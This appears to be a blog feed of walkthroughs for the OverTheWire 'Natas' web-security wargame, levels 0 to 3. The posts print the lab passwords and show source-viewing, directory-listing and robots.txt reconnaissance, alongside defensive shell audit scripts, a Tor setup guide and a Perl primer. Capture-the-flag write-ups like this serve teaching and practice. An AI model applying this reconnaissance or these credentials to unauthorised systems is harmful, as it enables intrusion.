<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuO2pGbFLglfnglQyf_p9_bK6Vg6n8Byx7HV6ggU0TqIfNeU7EJ3X1DCKSJg4TnWBA6lIuf8YbhMzPEpRkKVt81nqR0XBI7k8YtJ7M1ckCjIE4Hl5R5vhMf8g06naKE6GUGFnWaV0L7mA/s1600/5.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="187" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuO2pGbFLglfnglQyf_p9_bK6Vg6n8Byx7HV6ggU0TqIfNeU7EJ3X1DCKSJg4TnWBA6lIuf8YbhMzPEpRkKVt81nqR0XBI7k8YtJ7M1ckCjIE4Hl5R5vhMf8g06naKE6GUGFnWaV0L7mA/s640/5.PNG" width="640" /></a></div>
<br />
There we have it, natas5:V0p12qz30HEUU22dz7CZGHiFk3VdPA9Z.<br />
<br />
On to <a href="http://natas5.natas.labs.overthewire.org/" target="_blank">Level 5</a>!</div>
Marshallhttp://www.blogger.com/profile/04409832157088422324noreply@blogger.comtag:blogger.com,1999:blog-4181939565976903382.post-59627857597545784462012-10-30T10:38:00.001-04:002022-12-27T16:24:33.253-05:00OverTheWire Wargame "Natas" Level 3 [How-To/Web]<div dir="ltr" style="text-align: left;" trbidi="on">
After breaking <a href="http://www.hackavision.com/2012/10/overthewire-wargame-natas-level-2-how.html" target="_blank">Level 2</a> with some knowledge of how web servers hold their data, we move on to <a href="http://natas3.natas.labs.overthewire.org/" target="_blank">Level 3</a> which presents us with the same page as level 2:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0Pm8jn7f8BtkBEvFe4PChxFEvBAveTXF2bvLu8-RxCcfeRnr_Ez1snzDnC9ZCegq_4D1n3oxnDjJD6YovGe_h-7eb0PcwiROAXtFjYh7UuIqIhcdHI9AoYZ7nuFvR1qYRtQWW_qxB0ko/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0Pm8jn7f8BtkBEvFe4PChxFEvBAveTXF2bvLu8-RxCcfeRnr_Ez1snzDnC9ZCegq_4D1n3oxnDjJD6YovGe_h-7eb0PcwiROAXtFjYh7UuIqIhcdHI9AoYZ7nuFvR1qYRtQWW_qxB0ko/s1600/1.PNG" /></a></div>
<br />
<a name='more'></a>Doing the same thing as the other levels, we view the source and see this:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiI0Aw3UkY36mDw_kJc2jo0ZsJgdKHLffg7UVxKV4_hBVmQVOBoXG3_OsHzITaN0wfpggYjBs-2wbYqGsWV4bJDe7WhBORav-JTr9qqhOBvoxBEp695zM6aAXMvcwidJp5PCtk-jXQ6oqo/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="104" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiI0Aw3UkY36mDw_kJc2jo0ZsJgdKHLffg7UVxKV4_hBVmQVOBoXG3_OsHzITaN0wfpggYjBs-2wbYqGsWV4bJDe7WhBORav-JTr9qqhOBvoxBEp695zM6aAXMvcwidJp5PCtk-jXQ6oqo/s640/1.PNG" width="640" /></a></div>
<br />
Not even Google will find it? What does that mean?<br />
Well, if you didn't already know, web servers can host a file called "robots.txt" which tells search engines such as Google which paths <i>not</i> to index. Google has one that we can view <a href="http://www.google.com/robots.txt" target="_blank">here</a>. It's essentially a listing of the paths the website wants to keep "secret" from search engines... which of course makes it a public list of exactly those paths.<br />
<br />
Knowing this, let's see whether this website has a robots file by requesting /robots.txt under the site's URL:<br />
<blockquote class="tr_bq">
<pre style="white-space: pre-wrap; word-wrap: break-word;">User-agent: *
Disallow: /s3cr3t/</pre>
</blockquote>
So the site asks crawlers not to index the /s3cr3t/ folder... so let's just go straight <i>TO</i> that folder.<br />
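Because robots.txt is public and purely advisory, the lesson for anyone running a site is that it doubles as a checklist of places that need real access control. The shell functions below are an added example, not code from the original walkthrough: robots_disclosed lists every path a robots.txt advertises under Disallow, grouped by user-agent, and robots_hides checks whether a given path falls under one of those prefixes so it can be cross-checked against the server's authentication rules. The sample file is constructed here and extends the level's two-line file with a second group and a comment line.

```shell
#!/bin/sh
# Added example (not from the original post): audit what a robots.txt reveals.
# robots.txt is a request to crawlers, not an access control; every path it
# lists is readable by anyone, so each one must be protected server-side.

# Constructed sample: the level's two lines plus a second group and a comment.
SAMPLE_ROBOTS='# constructed sample, modelled on the level
User-agent: *
Disallow: /s3cr3t/
Disallow: /backup/

User-agent: Googlebot
Disallow: /private/
Allow: /public/'

# robots_disclosed: read robots.txt on stdin, print "<user-agent><TAB><path>"
# for every Disallow line, in file order. Comments and blank lines are ignored.
robots_disclosed() {
    awk '
        { sub(/#.*/, ""); sub(/[[:space:]]+$/, "") }   # strip comments, trailing space
        /^$/ { next }                                   # skip blank lines
        tolower($0) ~ /^user-agent:/ {                  # start of a new group
            ua = $0; sub(/^[^:]*:[[:space:]]*/, "", ua)
            next
        }
        tolower($0) ~ /^disallow:/ {
            p = $0; sub(/^[^:]*:[[:space:]]*/, "", p)
            if (p != "") print ua "\t" p                # empty Disallow means "nothing"
        }'
}

# robots_hides PATH: exit 0 if PATH starts with a Disallow prefix from the
# robots.txt on stdin (plain prefix match; wildcard rules are not interpreted).
# Anything it reports must also require authentication on the server.
robots_hides() {
    robots_disclosed | awk -F'\t' -v t="$1" '
        index(t, $2) == 1 { found = 1 }
        END { exit (found ? 0 : 1) }'
}

# Stand-alone demo: list what the sample discloses.
printf '%s\n' "$SAMPLE_ROBOTS" | robots_disclosed
```

Run it against your own site's robots.txt (for example, piped in from a saved copy) and treat every line it prints as a path to verify: if the directory is only "hidden" by this file, it is not hidden at all.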
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6ml_45A5Kz4yBjA1nqz0wC3eqwufqfigSa097kmGMnSqRlWdmlW8ZnAqX1U9aR-VYklQbUPfm0kElx4hs5q05n_4-9VQeYKmn4Bs2Sv-ACXOJUpigqhQkvJujTP9674aI6KGnRXqriaQ/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="197" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6ml_45A5Kz4yBjA1nqz0wC3eqwufqfigSa097kmGMnSqRlWdmlW8ZnAqX1U9aR-VYklQbUPfm0kElx4hs5q05n_4-9VQeYKmn4Bs2Sv-ACXOJUpigqhQkvJujTP9674aI6KGnRXqriaQ/s400/2.PNG" width="400" /></a></div>
Bam, users.txt again. Opening it up we can see:<br />
<br />
<blockquote class="tr_bq">
natas4:8ywPLDUB2yY2ujFnwGUdWWp8MT4yZrqz</blockquote>
This authenticates us to <a href="http://natas4.natas.labs.overthewire.org/" target="_blank">Level 4</a>.</div>
OverTheWire Wargame "Natas" Level 2 [How-To/Web] (Marshall, 2012-10-30)<div dir="ltr" style="text-align: left;" trbidi="on">
So <a href="http://www.hackavision.com/2012/10/overthewire-wargame-natas-level-1-how.html" target="_blank">Level 1</a> wasn't that bad, either. Let's start <a href="http://natas2.natas.labs.overthewire.org/" target="_blank">Level 2</a> with the credentials that we found in the previous level.<br />
<br />
When we load up level 2, we are presented with this:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0Pm8jn7f8BtkBEvFe4PChxFEvBAveTXF2bvLu8-RxCcfeRnr_Ez1snzDnC9ZCegq_4D1n3oxnDjJD6YovGe_h-7eb0PcwiROAXtFjYh7UuIqIhcdHI9AoYZ7nuFvR1qYRtQWW_qxB0ko/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="90" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0Pm8jn7f8BtkBEvFe4PChxFEvBAveTXF2bvLu8-RxCcfeRnr_Ez1snzDnC9ZCegq_4D1n3oxnDjJD6YovGe_h-7eb0PcwiROAXtFjYh7UuIqIhcdHI9AoYZ7nuFvR1qYRtQWW_qxB0ko/s400/1.PNG" width="400" /></a></div>
<br />
Kind of ironic since there's text, right?<br />
<br />
<a name='more'></a>Let's once again take a look at the source (this is becoming a thing!):<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6b-9fFdmQuQPvGaS6U1nVGv5caQNNxRxBDFauprYdkAhFvqQ7uCBi-48Y-9X3RZVg05nccNpCikkbiy-K5vxt7lT2O1xuyeHyJeHlZzEPQM9ACt8p7TgCRcCLJ5BpFDfG9ki6EMcy_AY/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="104" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6b-9fFdmQuQPvGaS6U1nVGv5caQNNxRxBDFauprYdkAhFvqQ7uCBi-48Y-9X3RZVg05nccNpCikkbiy-K5vxt7lT2O1xuyeHyJeHlZzEPQM9ACt8p7TgCRcCLJ5BpFDfG9ki6EMcy_AY/s640/2.PNG" width="640" /></a></div>
<br />
Hmm, just the normal text... and wait, an image? The &lt;img src...&gt; tag is HTML for embedding a picture in a webpage. This one points at files/pixel.png, so we know that path exists on whatever server is running this webpage.<br />
<br />
Let's try to navigate to it!<br />
<br />
Well, if you opened it like I did, it's just a white page. That makes sense since it's just one pixel. But we know it <i>exists</i> on the server, and there has to be a folder called <i>files.</i> Let's see if we can get to that folder...<br />
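The reasoning above, that a src attribute pointing at files/pixel.png proves a files/ directory exists, can be turned into a quick audit of what directories your own pages advertise, together with a check for the auto-generated listing page that this level exposes. The functions below are an added example, not code from the original post; the HTML they scan is constructed here and modelled on the level's page, with a stylesheet link, a third-party script and a relative link added so the filtering is visible, and the listing sample uses the "Index of" title that Apache's mod_autoindex and nginx's autoindex both generate.

```shell
#!/bin/sh
# Added example (not from the original post): list the directories a page's
# src= and href= attributes reveal, and recognise an auto-generated listing.
# Every directory printed is one that must not have listing enabled and must
# not hold anything sensitive.

# Constructed sample modelled on the level's page; the stylesheet, the
# third-party script and the relative link are added to exercise the filtering.
SAMPLE_HTML='<html><body>
<h1>natas2</h1>
<p>There is nothing on this page</p>
<img src="files/pixel.png">
<link rel="stylesheet" href="/css/level.css">
<script src="https://cdn.example.com/lib.js"></script>
<a href="index.php">home</a>
</body></html>'

# Constructed sample of what a web server sends when listing is enabled.
SAMPLE_LISTING='<html><head><title>Index of /files</title></head>
<body><h1>Index of /files</h1>
<a href="pixel.png">pixel.png</a> <a href="users.txt">users.txt</a>
</body></html>'

# referenced_dirs: HTML on stdin, one local directory per line, sorted, unique.
referenced_dirs() {
    grep -o -E '(src|href)="[^"]+"' |                   # every src="..." / href="..."
    sed -E 's/^[a-z]+="//; s/"$//' |                    # keep only the quoted path
    grep -v -E '^(//|[A-Za-z][A-Za-z0-9+.-]*:)' |       # drop URLs that point at other hosts
    sed -E '/\//!s#.*#.#; s#/[^/]*$##; s#^$#/#' |       # path -> its directory
    LC_ALL=C sort -u
}

# is_directory_listing: exit 0 if the HTML on stdin looks like an auto-index
# page (Apache mod_autoindex and nginx autoindex both title it "Index of /...").
is_directory_listing() {
    grep -q -i -E '<title>[[:space:]]*Index of /'
}

# Stand-alone demo.
printf '%s\n' "$SAMPLE_HTML" | referenced_dirs
if printf '%s\n' "$SAMPLE_LISTING" | is_directory_listing; then
    echo "listing detected"
fi
```

On Apache, `Options -Indexes` in the directory's configuration turns the listing off; the better fix is to keep files like users.txt out of the web root entirely, since disabling the index only hides the names, not the files.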
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEje-oHmF2OBgxq3NgQy-ZeSVaPfJ32qJfnFE28JwCdpghNWkk6b1cfN6QaTbvBAeoJgl2xV4QZeE_Ms5cQhMRLTAx921Esk8yP6kIwk5Aw1r9lkjjBzMY5bNf2es_A6oNkQ7xuu7Y2L5Ww/s1600/3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="255" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEje-oHmF2OBgxq3NgQy-ZeSVaPfJ32qJfnFE28JwCdpghNWkk6b1cfN6QaTbvBAeoJgl2xV4QZeE_Ms5cQhMRLTAx921Esk8yP6kIwk5Aw1r9lkjjBzMY5bNf2es_A6oNkQ7xuu7Y2L5Ww/s400/3.PNG" width="400" /></a></div>
<br />
That's something we like to see, a directory listing! We can also see there's another file called "users.txt" in there!<br />
Opening <i>users.txt</i> gives us:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2KgVWJnT6JVdltIeVYw_PaH4v57EGMwqzM5HhUuwxuHy8_Lcn8G0AlzHe7Y20hJ1TcbZ7I9NZGd52CNV9mt0njCkW8H58e_K-mRmkD0MHE_MryR40i52DmSk9wsQ1NsqWBEyOfiF_T54/s1600/4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="122" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2KgVWJnT6JVdltIeVYw_PaH4v57EGMwqzM5HhUuwxuHy8_Lcn8G0AlzHe7Y20hJ1TcbZ7I9NZGd52CNV9mt0njCkW8H58e_K-mRmkD0MHE_MryR40i52DmSk9wsQ1NsqWBEyOfiF_T54/s320/4.PNG" width="320" /></a></div>
Yay, a password for natas3!<br />
We enter natas3:<span style="white-space: pre-wrap;">lOHYKVT34rB4agsz1yPJ2QvENy7YnxUb on the <a href="http://natas3.natas.labs.overthewire.org/" target="_blank">next level</a> and continue on...</span></div>
OverTheWire Wargame "Natas" Level 1 [How-To/Web] (Marshall, 2012-10-30)<div dir="ltr" style="text-align: left;" trbidi="on">
<a href="http://www.hackavision.com/2012/10/overthewire-wargame-natas-level-0-how.html" target="_blank">Level 0</a> was quite easy, for obvious reasons, so let's see if <a href="http://natas1.natas.labs.overthewire.org/" target="_blank">level 1</a> can be any harder.<br />
<br />
For this one, right clicking has been blocked, so we can't break it like we did with level 0... or can we?<br />
<br />
<a name='more'></a>Again, I use Google Chrome, and in Chrome, you can save the source code to your drive!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3KE_c6sasKiUfbxrws3iQaKitioEGeZuFRNI5wnPI6BK6nA78OQ0fyFRgciYNNPES3eCD0138C63s4Kmxe74kBa3b_DLfDTODM-_PQDuvzU8xIDVAgydyF2LG8piHRLmgVGgef8Lo1H4/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3KE_c6sasKiUfbxrws3iQaKitioEGeZuFRNI5wnPI6BK6nA78OQ0fyFRgciYNNPES3eCD0138C63s4Kmxe74kBa3b_DLfDTODM-_PQDuvzU8xIDVAgydyF2LG8piHRLmgVGgef8Lo1H4/s320/1.png" width="210" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
If you open this up in a browser, it will still block right-clicking, so let's open it with our trusty friend Notepad++ (or you can <i>cat</i> it on a Linux system; I'm on Windows 7 right now).<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgLoRl236MUCtBRfoqk-zoiAuMRcnXMPgzW6lL9o5nHVG2cdolNU6xgjlvTD3A6nmVNjfHSYA9OdZedn7suy9bml0Sys4afVOFMx7gq6Ypg3d3ionwfVeHqyRjlYszY-PI5aLcFsBdbrM/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="126" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgLoRl236MUCtBRfoqk-zoiAuMRcnXMPgzW6lL9o5nHVG2cdolNU6xgjlvTD3A6nmVNjfHSYA9OdZedn7suy9bml0Sys4afVOFMx7gq6Ypg3d3ionwfVeHqyRjlYszY-PI5aLcFsBdbrM/s400/2.PNG" width="400" /></a></div>
<br />
Bam, we have the password for natas2: "aRJMGKT6H7AOfGwllwocI2QwVyvo7dcl".<br />
<br />
Just as easy, but it required a tiny bit of thinking on how to get the code. Let's move on to <a href="http://natas2.natas.labs.overthewire.org/" target="_blank">Level 2</a>.<br />
<br />
Here's a short aside if you care to know why this is bad, or rather why programming <i>like</i> this is bad.<br />
This is known as client-side security, and it is <i>really bad</i>: anything that runs on the client is controlled by the client, and therefore by the attacker.<br />
A user can save the page, change the code, and load it again, or change it directly in the browser by simply "inspecting" the code, which Chrome allows out of the box... and that's not even an add-on!<br />
<br />
<span style="font-family: Courier New, Courier, monospace;">Keep hackin'.</span></div>
OverTheWire Wargame "Natas" Level 0 [How-To/Web] (Marshall, 2012-10-30)<div dir="ltr" style="text-align: left;" trbidi="on">
<a href="http://www.overthewire.org/news/" target="_blank">OverTheWire</a> has released a new WarGame called "Natas" which focuses on web security, so I thought I'd try my hand at it and give some walkthroughs/how-tos as I beat each level. I'm still a newbie at websec, so deal with me!<br />
<br />
Going to the front page of <a href="http://www.overthewire.org/wargames/natas/" target="_blank">Natas</a>, it gives us the creds to get into level 0, so we need to find level 1's creds somehow.<br />
<br />
<a name='more'></a>We go to <a href="http://natas0.natas.labs.overthewire.org/" target="_blank">Natas Level 0</a> and enter the creds given to us, "natas0:natas0", which presents us with this page:<br />
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjF6q4mldgdjijcowxVoLIh6Dgi04BQEYnkZ_gpi2Czyh-mfhnM_sWZWqluaI9yscFZ9_nAZ_z3A6sk0ZterEr5Z27Y9FBP8RX_q7kU_4HHHaHElUMNAhdSkCcKDqqrBfB6fArYqGxiHIE/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="148" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjF6q4mldgdjijcowxVoLIh6Dgi04BQEYnkZ_gpi2Czyh-mfhnM_sWZWqluaI9yscFZ9_nAZ_z3A6sk0ZterEr5Z27Y9FBP8RX_q7kU_4HHHaHElUMNAhdSkCcKDqqrBfB6fArYqGxiHIE/s640/1.PNG" width="640" /></a></div>
<div>
<br /></div>
<div>
I use Google Chrome as a browser, which can view the source of a webpage directly. To do this, right-click and select "View page source":</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjYK1wJ2t34Oh6Dm5U0N6O0p4YSe-ndLsjXm7G0YuRO26Mpsit0cNBLjCmif6kr5DwVzpj-jdwBOeleTTVSLfBA0dxgjXM_2bzIM1_4NSit0cZcW2itClten-EfEZnwGbUkyEKCWi4yQY/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjYK1wJ2t34Oh6Dm5U0N6O0p4YSe-ndLsjXm7G0YuRO26Mpsit0cNBLjCmif6kr5DwVzpj-jdwBOeleTTVSLfBA0dxgjXM_2bzIM1_4NSit0cZcW2itClten-EfEZnwGbUkyEKCWi4yQY/s1600/2.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div>
This gives us the source code, which breaks the first level:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibf0xPKqcgZASb0yCVTulhX5C8Ja635LsjIFgQXNgq9-qgr-tTxAD3GW5fMT_S7o11eOYh_wcRfVsXGQyznm61dVUNfYKSq3rEN9QGJ0B5l5IlSRZG0ABkG-lGixlpgBuy2Q6AOzF7ex0/s1600/3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="128" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibf0xPKqcgZASb0yCVTulhX5C8Ja635LsjIFgQXNgq9-qgr-tTxAD3GW5fMT_S7o11eOYh_wcRfVsXGQyznm61dVUNfYKSq3rEN9QGJ0B5l5IlSRZG0ABkG-lGixlpgBuy2Q6AOzF7ex0/s640/3.PNG" width="640" /></a></div>
<div>
<br /></div>
<div>
We can see that the password is "9hSaVoey44Puz0fbWlHtZh5jTooLVplC", and we know the username for the next level is natas1, so we can continue to <a href="http://natas1.natas.labs.overthewire.org/" target="_blank">Natas Level 1</a>, congrats!</div>
</div>
Anonymous browsing with Tor [Windows/Linux/Firefox/Chrome] (Marshall, 2012-03-06)<div dir="ltr" style="text-align: left;" trbidi="on">Anonymity online is one of the most important rights users have today and is a right we are slowly losing due to bills and laws being passed in governments worldwide, especially in the United States.<br />
<br />
Bills like SOPA/PIPA/ACTA and other unconstitutional and unlawful proposals are everywhere and the Internet is standing up against them, with massive sites like Wikipedia and Reddit blacking out their services to bring awareness.<br />
<br />
<br />
<a name='more'></a><br />
If these are passed, everyday Internet interaction would change forever. Those who have visited China or know of the "Great Firewall" are appalled that any government would want to do this to its citizens and their freedom, but alas, governments always want more power and money, and this is the way to it.<br />
<br />
Well, enough of the political preaching, let's get into how to bypass these "Great Firewalls" and other proxy settings to have anonymity on the Internet! Just a note though: it is impossible in this day and age to achieve perfect anonymity. At least one node, person, or organization other than yourself knows who you are and what you view. <b>Using the methods here to conduct illegal activities will not make you safe, you WILL GET CAUGHT eventually</b>, especially if you do it often enough. I'm writing this how-to and informational piece for those constricted by governments or any other blocking method that removes the freedom of the Internet, so again... do not conduct illegal activities without accepting the consequences (which <i>will </i>come).<br />
<br />
The biggest proxy service in use today is TOR, or The Onion Router. TOR was created to provide anonymity online for anyone. Their main page is located at <a href="https://www.torproject.org/">https://www.torproject.org/</a>, where you can read up more on them, but I'll be telling you how to install TOR for your needs on Windows and Linux computers.<br />
<br />
<span style="font-size: x-large;"><u>Installing TOR on Windows (XP-Vista-7)</u></span><br />
<br />
Now, installing Tor is quite easy. First, go to <a href="https://www.torproject.org/download/download-easy.html.en" target="_blank">this website</a> and click the large orange "Download" button. It's 20.4 MB, so it should only take a few seconds to download. After it's done, run the .exe by double-clicking it, or single-clicking it in the download bar if you're using Chrome.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="http://i.imgur.com/rgtkc.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="120" src="http://i.imgur.com/rgtkc.jpg" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Click the orange "Download" button and run the .exe</td></tr>
</tbody></table>After running the executable, an extraction location will appear. Whatever the default is should be fine. <b>Remember this location.</b> Mine was my downloads folder (where I originally downloaded it to). Just click "Extract" and let it do its work; this should take a minute or so.<br />
<br />
When it's done extracting, move to that directory, and in there should be a folder called "Tor Browser" with everything in it. Yeah, that was easy, right? You can move this folder to wherever you want to "install" Tor to, but it's about 84 MB, so in this day and age anywhere is really fine. Let's explore what goodies are in the folder now!<br />
<br />
In the "app" folder are all the .dll files necessary for Tor to run.<br />
In the "data" folder are most of the configuration files.<br />
In the "docs" folder are readmes and open-source licenses.<br />
In the "FirefoxPortable" folder is the portable version of Firefox that Vidalia (a vidalia is a type of onion, by the way) uses.<br />
Finally there's the executable "Start Tor Browser"; go ahead and double-click that and let Tor load up its GUI (graphical user interface).<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="http://i.imgur.com/NZUww.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="320" src="http://i.imgur.com/NZUww.jpg" width="279" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Vidalia</td></tr>
</tbody></table>This is Tor's GUI, called Vidalia. While it loaded, the bar where "Connected to the Tor network" now appears showed it connecting and authenticating. Also, when you load up Vidalia, it automatically opens the portable Firefox, already connected. Let's test this out and review it.<br />
<br />
If you take a look at the Firefox home page, it's Tor's check website, which tells you whether you're using Tor (how useful!).<br />
Mine looks like this:<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i.imgur.com/o55Zg.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="105" src="http://i.imgur.com/o55Zg.jpg" width="400" /></a></div><br />
As you can see, it tells me my IP address... but wait... that's not my REAL IP address! It's a proxied IP address somewhere in the world! If you want to check it against yours, open a command prompt (Start menu -> Run -> "cmd"), then type "ipconfig /all" and look for your "IPv4 Address".<br />
<b>Note: </b>if you're behind a router, this will be a private address (192.168.x.x). We'll talk about private addressing in another post soon. If you want an alternative to see your real IP address, open up a new browser with Tor not enabled and go to <a href="http://whatismyip.com/" target="_blank">whatismyip.com</a> and it will tell you your REAL IP address.<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjV6sQNLLIj4EgdmtyNNwy_vs9WmlKp517NrpbfHMSh2QASbvJutrjoQAwntTO5oHXdI_X87RbclKhQNjKaaV-ldsFxsIIQGDsNiCZCdB_Juo8TK4NJQ73ykxJeZ9R1ros26jvbjaEzwHk/s1600/TR5Wv.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="68" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjV6sQNLLIj4EgdmtyNNwy_vs9WmlKp517NrpbfHMSh2QASbvJutrjoQAwntTO5oHXdI_X87RbclKhQNjKaaV-ldsFxsIIQGDsNiCZCdB_Juo8TK4NJQ73ykxJeZ9R1ros26jvbjaEzwHk/s320/TR5Wv.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Too lazy to open Photoshop to blur!</td></tr>
</tbody></table>As you can see, the last two octets (an octet is 8 bits; I will make a post about subnetting and binary later for you guys!) are different from the last two in my Tor IP address.<br />
<br />
Going back to the main window of Vidalia: the "Stop Tor" button is quite obvious in what it does (it stops Tor!), so I cannot really expound upon that any further.<br />
There are a few cool things here if you want to explore them. For instance, the "view the network" button gives you an amazing look at the connections going on in the Tor network including their IP addresses, their bandwidth, time up, and other interesting facts. It gives points on the map of where they are located and you can zoom in on them.<br />
<br />
The "Setup Relaying" button is used if you wish to become a forwarding node for the Tor network. If you live in a country outside the United States, I highly suggest looking into your local and federal laws to see whether you could run into any problems, and if possible, become a node. Here's the main link to get you started: <a href="https://www.torproject.org/docs/tor-doc-relay.html.en" target="_blank">Relay Configuration</a>.<br />
<br />
The "use a new identity" button refreshes who you are connecting to and updates your IP address. Useful if you want to update your "location" every little while to retain more anonymity.<br />
<br />
The bandwidth graph shows your input/output on the Tor network and is useful to see which nodes have faster connections and the sort.<br />
<br />
The message log is not very useful to the average user, but may come in handy if you need to use it.<br />
<br />
The settings are used if you wish to start Vidalia and the Tor service at startup (it's off by default), or to update your relaying status, but the settings can all stay default for the average user.<br />
<br />
The exit button closes your Tor connection and the Firefox window associated with it, so don't close the Firefox or Vidalia unless you want to close the other one as well.<br />
<br />
Well, this was a quick write-up for now; I'm going to add in the Linux section as soon as I get dual-booting working on my Dell XPS 15 (there's a large issue with the BIOS and dual-installing, but I should have it fixed soon), and I'll add in the details of how an onion network runs and other cool things.</div>Scripting in Perl! [Linux/Windows] (Marshall, 2011-10-07)<div dir="ltr" style="text-align: left;" trbidi="on"><div dir="ltr" style="text-align: left;" trbidi="on"><div dir="ltr" style="text-align: left;" trbidi="on">So currently at school I'm taking a Scripting in Perl class, and I'm in absolute LOVE with this language. It's easy to understand, has very good English-like syntax, simple array and hash usage, built-in BASH support (for all you Linux freaks!), easy GUI creation, and so many other things that we haven't even gotten into.<br />
I'll be posting examples based upon things in my lab and lecture, including full programs, certain syntax, and other cool things. My teacher is very good and explains many things, so you have him at your disposal (meaning, ask me a question I don't know and I'll ask him, learn it, then explain it back to you!).<br />
<br />
Let's get started with basic syntax, then get into all the fun stuff.<br />
<br />
<a name='more'></a>Let's go over variables really quickly. First of all, variables are declared or initialized with the "$" character. In C++ or Java we say "<i>int variable = 0</i>" or the like, but in Perl it's unique.<br />
In Perl, we initialize numeric variables with the command:<br />
<i>my $variable = 0;</i><br />
which means we create the variable "variable" and set it equal to zero. To just declare it, it's as simple as saying "<i>my $variable</i>".<br />
<br />
Now you might be confused with the "my" command. This deals with the SCOPE of the variable. Many of you probably know what "scope" means, but if you don't, here's a quick definition.<br />
The "scope" of a variable can be thought of as the lifetime of that variable, or where it can be referenced in your code. If you declare a variable in one block of code (say, a for loop), but try to change it outside of it, Perl won't allow it since it can't "see" the variable because it's "dead" or out of our scope!<br />
I'm sure you'll all understand the "my" command soon enough, it's pretty simple and doesn't require much thought; just make sure you use it when declaring and initializing variables for the first time.<br />
<br />
Now, remember how I said we initialize "numeric variables" with the above command? Well, you might be surprised to hear that numeric variables and strings are created the same way!<br />
Here's how we create a simple string:<br />
<i>my $string = "this is some text to equal string";</i><br />
and it's as simple as that.<br />
<br />
Perl looks at the value of the variable rather than the type, so you don't have to say "double" or "int" or "string"!<br />
